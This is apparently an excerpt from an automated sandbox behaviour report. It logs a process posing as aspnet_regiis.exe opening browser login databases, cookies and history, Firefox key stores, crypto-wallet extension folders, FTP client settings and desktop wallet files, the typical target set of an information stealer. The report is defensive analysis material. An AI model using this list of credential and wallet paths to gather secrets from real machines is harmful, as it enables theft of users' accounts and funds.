                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
